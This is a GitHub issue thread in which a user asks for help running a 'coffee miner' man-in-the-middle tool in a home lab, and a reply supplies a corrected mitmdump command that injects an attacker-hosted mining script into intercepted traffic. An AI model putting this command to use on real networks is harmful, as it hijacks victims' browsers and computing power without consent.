You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello I am trying to get the coffee miner to work on my computer. I am using virtual box running kali linux as the attacker on my mac and using my mac as the victim. For the victim.text i placed my mac computer ip address. I think the problem is im mixing up my attacker ip address and gateway ip address. I am getting this error /usr/bin/mitdmdump: No such script: "injector.py http://10.0.2.20:800/scripts.js" can someone please help me
The text was updated successfully, but these errors were encountered:
had the same problem. its just the apostropy causing this.
set your line 28 like this and it will work.
("~/.local/bin/mitmdump -s injector.py 'localhost:8000/script.js' --mode transparent")
notice how double and single quotes are set.
Hello I am trying to get the coffee miner to work on my computer. I am using virtual box running kali linux as the attacker on my mac and using my mac as the victim. For the victim.text i placed my mac computer ip address. I think the problem is im mixing up my attacker ip address and gateway ip address. I am getting this error /usr/bin/mitdmdump: No such script: "injector.py http://10.0.2.20:800/scripts.js" can someone please help me
The text was updated successfully, but these errors were encountered: